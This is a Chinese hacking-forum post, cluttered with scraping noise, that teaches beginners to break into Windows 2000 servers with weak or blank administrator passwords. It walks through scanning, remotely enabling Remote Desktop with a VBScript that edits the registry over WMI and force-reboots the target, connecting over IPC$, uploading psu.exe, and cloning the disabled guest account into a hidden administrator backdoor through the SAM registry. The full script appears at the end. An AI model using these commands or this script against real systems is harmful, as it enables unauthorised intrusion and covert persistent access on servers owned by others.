该用户从未签到
|
一次简单的3389入侵过程 7 B4 m+ Q9 L; P: L$ Q
原创:caozhe(草哲) & S7 s2 E4 @' }+ X* M( J
来源:中国欲网技术论坛--草哲
- e3 r4 A; c( K }) O; \ 4 K- {8 R( S# w! Y
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!+ P( \$ f' w- q
. i9 P: N/ z; ?( X. G0 o
于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!
$ Z4 B5 ?6 c- C/ T, g* G7 g6 ]要入侵,我建议你在win2000环境下来*作!0 H' a0 d' H1 v0 K5 w0 C0 x- ^
3 E/ q: h0 E0 K- o) a2 b首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!, b" w3 z+ L$ h) d" s/ P
扫描的X-Scan V2.3、WINNTAutoAttack、流光!5 N0 S4 b% ? d. o2 ]
X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
* y" q$ ]6 Q- W( }# c4 P远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe): M; p3 k' g0 r# d& c
克隆帐户用个psu就可以了~!
$ y8 s: t$ P# p( N1 o t( Q8 f% x
& G( X4 }( Y [) z: y5 D2 k: ^( C: AOK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空* H8 p7 i4 }' B: r6 \
运行CMD(2000下的DOS),我们给它开终端!& Z! ~% @8 H) X6 Y
命令如下!; B- S7 J1 Y# W. G" F$ |& D
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
, \" T7 I; L2 n. Q4 f上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
/ v0 y5 A8 x3 g& G; }6 q# D8 D+ l( | {! Q! l
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
" N7 q, Z+ J/ r0 ~ v- y; j- g( Z* h
6 c0 Q1 j, \3 B5 [/ T/ q# i一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t# I) ~# n, o$ P' D
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!( ~8 B! Y2 R$ R8 a/ b2 ~& R; V" r
T6 L4 ^; Z/ z% e( o
回到DOS下!我们建立IPC$连接!
4 r- H( x6 ]% ^8 ~; @: @net use \\120.0.0.1\ipc$ "" /user:"administrator"
8 q# } h2 G; L5 [+ y这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!% p# x% D z7 S& ^; @3 n( p( x
copy psu.exe \\120.0.0.1\admin$\system32
) o/ A6 G7 q4 }上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
8 f+ {: T, S1 u! g5 L g
. W# z! W1 {7 ^# n; }" u/ k- }8 x假设guest用户被禁用,我们就是要利用guest做后门帐户!
$ l' |1 z$ t2 l0 H在该服务器运行CMD,在命令行下输入( q& S7 Y& m6 t q) I5 Y
psu -p regedit -i PID
& y) m! @6 I4 K5 J& }# u6 z# E1 ?9 t5 i8 _9 }: Z0 Y& ]* t
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器! ~; l% g# Z0 x4 u* S
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是54587 g7 L" ]" ]/ t
那么,命令就是这样5 r) D; L: o1 U [. W# R/ y/ ~
psu -p regedit -i 5458& k+ z4 B, O- ]" n
这样直接打开注册表,可以读取本地sam的信息。
x0 g' _" Q3 g9 D* q打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users8 R8 M3 J- i' n& R
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!: G" ]% k8 K3 E$ u! \. u* L
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names5 p @( k: n1 T# `
查看administrator的类型,是if4,再看guest的是if5% E4 D0 o/ S+ w9 U
好了,知道了类型后,打开6 g9 C4 W. \1 m8 T
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
; O: |, A5 W* C. A: C这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开9 f: D1 i' M1 U6 M$ x) Z" w/ `* A
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
; F: ^7 E2 x" U6 `: h' L7 c4 s双击右侧的F,把刚复制的粘贴到里面!& I* s) O8 m; T
) }% N# J. |. ~. K/ y9 {5 B$ n做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
U5 ]0 U$ ~( K5 ?; ?和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
; S: ~" ?& w F" L% I; h这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。 Z8 e3 l' r6 x7 W' Q( P
2 Q3 L. U- L' b& v5 T打开CMD,在命令行下输入
4 f" H% n6 L( @0 d& `' l& J$ S9 vnet user guest password7 L4 x+ g6 ?" m+ |# z" Y
这条命令是给guest设置密码,后面的password就是密码
7 j2 v d, H" e: H% I! d然后输入
/ B0 p/ u6 _ E: unet user guest /active:y
8 o: P( D1 E6 o7 ]: `; u% M这命令是激活guest帐户,然后我们把他禁用9 I: t8 i% U. W& c
net user guest /active:n
! }5 S4 @: L) g/ @; Q7 c上面的三行命令必须在DOS下执行!
6 y, W' j6 p* q p% b: U- N9 J6 G
! y7 F H4 e0 JOK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!1 Y% M9 K6 \9 Q3 D' {) I& I
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!- N; j4 x# Z6 p8 a0 _
$ J4 u: `. y, f/ X r
注销一下,用guest登陆吧!
# Y% X; {2 N2 ^0 f
9 S( e2 s6 P% z8 A) F' d, _$ z打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!
8 c& H. k9 j# e: ~1 [0 E; \如果还有地方不明白的话,可以问我,我知道的一定告诉大家!
) g, l" E7 Q& C# s1 y1 p3 a! n& C- c7 F2 W
因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!
% Q8 }* T! P6 `$ ~+ j; F2 x0 V' B$ j" E, {* P4 V. P, k3 X* J6 d2 \
----------------------------------------------------------------------) | X$ e y' A1 U- L
以下是开终端的脚本,把它存为*.vbe
% v/ B3 k5 f Y4 y1 C( bon error resume next& j5 Q& }! W7 d: ?
set outstreem=wscript.stdout7 j* j6 R% F1 e% \2 N& D }
set instreem=wscript.stdin
9 I5 w, o O) m3 Q* Zif (lcase(right(wscript.fullname,11))="wscript.exe") then+ {8 N) `6 x( `& S5 a# y2 R
set objShell=wscript.createObject("wscript.shell")' m% p% g; k. ^ q. V( h! w
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)); _4 _$ X4 y! q) N& N" g
wscript.quit
' Q8 X7 z/ x# D/ a9 c) Y" G7 M! |7 Xend if) p3 y- F! N* O( u, v0 ]
if wscript.arguments.count<3 then
3 W# p! [2 r6 M! s' y% A2 e usage()
7 }1 q4 a( Z+ r( m4 | wscript.echo "Not enough parameters."
& t5 ?: ]* Z0 O; ]" ]7 S: o wscript.quit) r; }5 E* ?( a M) c2 A* ]
end if
, j1 i2 R$ P0 }/ _( V) L* R! H% T7 y% v" p
ipaddress=wscript.arguments(0)
]% g: L+ h8 E* Uusername=wscript.arguments(1)6 J/ }6 g; m" b9 M1 [
password=wscript.arguments(2)
% S0 ~$ y3 D* Qif wscript.arguments.count>3 then
" \6 T* _7 t- ^ port=wscript.arguments(3)1 L! v l- ^! @5 t
else
) G. i3 V" w: }. d) i. x( Y0 X& s8 D port=33893 ?& B; g: l' ?( j2 u4 f. G8 z! v
end if
" Y% M; i; w) M# q! U9 aif not isnumeric(port) or port<1 or port>65000 then1 \ I* X, b% }- l0 c. d+ U8 u
wscript.echo "The number of port is error."& O& Z; B6 j. j
wscript.quit
$ h: f! h6 b) n v: W$ y8 [+ \end if: Y! z- M) @& B2 T3 j9 d* i# |" m$ d
if wscript.arguments.count>4 then
/ d; x( E& N; S7 @ K$ p3 b reboot=wscript.arguments(4)
, |/ A$ @9 y# t; f* U6 {" B8 Q* relse
' X) L6 ?& e2 _% P reboot=""( h0 \ S4 Y' _" t C/ Z) r0 f4 A& p
end if! j/ b, o7 K; X0 r/ O2 K' [
) A0 z& }* t) k3 \5 {. ^
usage()1 Q1 H+ C$ Q) @& G' w2 M
outstreem.write "Conneting "&ipaddress&" ...."2 m: s5 ]" m7 i$ s: |
set objlocator=createobject("wbemscripting.swbemlocator")# D$ N2 Q0 E# h0 c' j( {- [! E; d n5 t
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)2 G* [ u% ]6 l6 w; ~( p) p \
showerror(err.number)) r4 ~ W7 X/ b' Y* M
objswbemservices.security_.privileges.add 23,true
@. Z! A& `% Y: j/ zobjswbemservices.security_.privileges.add 18,true' J5 Q( B" E) N4 S6 B+ ]
' _% m+ M+ H9 youtstreem.write "Checking OS type...."
' h8 J" e% u. M) a. |- S7 hset colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")& f- `% W. `0 e9 P
for each objinstoscaption in colinstoscaption, }8 x9 W. ]3 c
if instr(objinstoscaption.caption,"Server")>0 then
) u4 _# [, H( s wscript.echo "OK!"
5 v9 S9 H; V! Y h* f else
( z7 w+ C- X5 `# q wscript.echo "OS type is "&objinstoscaption.caption: E2 d. Z) S0 B% b% Q( d: Q J' Y( e
outstreem.write "Do you want to cancel setup?[y/n]"
( ]+ R, v) W( `7 ~9 i7 S strcancel=instreem.readline! X* p# R6 Q# X$ A# J
if lcase(strcancel)<>"n" then wscript.quit9 p% A4 Z% T0 W- p
end if( }, ~8 R7 \( b% Y/ S- o
next
; x+ ?4 K- Y* n" p1 m" K e
2 l3 x! @7 n: t7 S F' T' k) O% toutstreem.write "Writing into registry ...."! o! v! Q; K$ i0 p2 C P
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")" ]/ c8 V5 F t- n; T- n+ I5 {0 C
HKLM=&h80000002$ r( M ]* ]8 Z5 k3 m" O3 j
HKU=&h80000003! f1 e6 R3 m. ?2 m6 A
with objinstreg; x/ n5 E* K6 g& g
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
7 @' o+ J( b/ t1 v" X9 ].setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",02 i7 c) @) s* @1 {6 Q% |5 U
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"1 ~' k% z& J/ t/ f4 b% ]! O: v" w
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",16 ^1 g" d( d$ t( l8 e
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
2 Z8 I' N2 W3 h; |7 ].setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2* W4 x! t% l" D" z/ J- P
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2" p$ R! s6 e% ?+ j, _: o4 Z% n! B
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
( T( K8 Y: [% o4 x.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
. I! E( u" l `end with
+ D. N9 b0 u: d8 |/ _showerror(err.number); R7 j3 E$ h' N# G) g) G( {; k# U
l4 F% \! e. T5 K$ X3 f/ u1 x
rebt=lcase(reboot)
& o. W+ U9 H' Cflag=07 h2 N$ v' r7 {! j, o, e* y
if rebt="/r" or rebt="-r" or rebt="\r" then flag=25 i7 w( Q$ g$ r, {% W
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6& O, G- ], ^* g
if flag<>0 then/ i1 c6 z& S& H: z7 r% ?' V$ O
outstreem.write "Now, reboot target...."2 U5 | K9 ]" X- I7 E
strwqlquery="select * from win32_operatingsystem where primary='true'"
2 U8 C' F; i* r. R set colinstances=objswbemservices.execquery(strwqlquery); H( Z5 ^) A- Y! D* }3 ?
for each objinstance in colinstances1 W7 S( R4 @5 Z8 b3 W- d8 _, @
objinstance.win32shutdown(flag)
) R T! K9 f o* E" Z next
* G: j y0 Y$ J. @' _ showerror(err.number)
# w0 g1 t- R. J4 `. w" Gelse
$ o- P# e- q6 S9 H8 v3 V& s wscript.echo "You need to reboot target."&vbcrlf&"Then,"
2 G" {+ c/ L$ U7 V S3 n' Qend if1 l- r* ?8 G1 r0 E+ O
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"0 O8 @8 L! ]5 m9 e' H9 J- F
& I2 c5 M, w/ R* B5 Y: G/ m0 @) Dfunction showerror(errornumber)5 e# T3 @+ j w0 b
if errornumber Then" F& L* ~& \8 w# V( u0 j( I
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
9 G/ P8 H6 L- R- q if err.description <> "" then( Z3 h) D9 I) v# L) p3 v: @
wscript.echo "Error description: "&err.description&"."2 X; ] L+ [; e( p* Z
end if
9 Y( k" u1 Z8 S wscript.quit
- g: v' r% ?! Eelse
4 k; d/ @1 \- _8 B% H8 R$ B/ A wscript.echo "OK!"% ] F+ Z6 E$ E) v4 U; R; n5 S
end if
; Q/ Q0 c5 Y- p9 b+ `end function/ j" j+ Y" Q) H1 B( a7 e
; Y! i2 g1 u: J4 ?3 y3 y
function usage()- E7 ~& _ {8 o a$ |# ^
wscript.echo string(79,"*")
2 {, r5 a3 \- Z8 r/ ]3 e+ I2 cwscript.echo "ROTS v1.05". k; E# S5 U- t* S& |5 L6 r
wscript.echo "Remote Open Terminal services Script, by 草哲"- i( y/ `1 @0 \: ^! Q4 ^) |
wscript.echo "Welcome to visite www.5458.net"
+ y& D. C0 Q2 x) z- g ~wscript.echo "Usage:"# z B1 A3 \* Z
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
/ P$ K, A. J, b# R; q4 O) Cwscript.echo "port: default number is 3389.") P( W( }, ^0 z7 s( F0 F& j
wscript.echo "/r: auto reboot target."% j( Y% Y c8 ~5 [
wscript.echo "/fr: auto force reboot target."
# X& s3 u+ @% [2 Y% k/ mwscript.echo string(79,"*")&vbcrlf) Z) a2 t3 n6 A& T- U
end function
8 i. E5 j! W- R5 X C) q / A( w0 J$ S0 s$ W9 l
转自安全焦点 |
|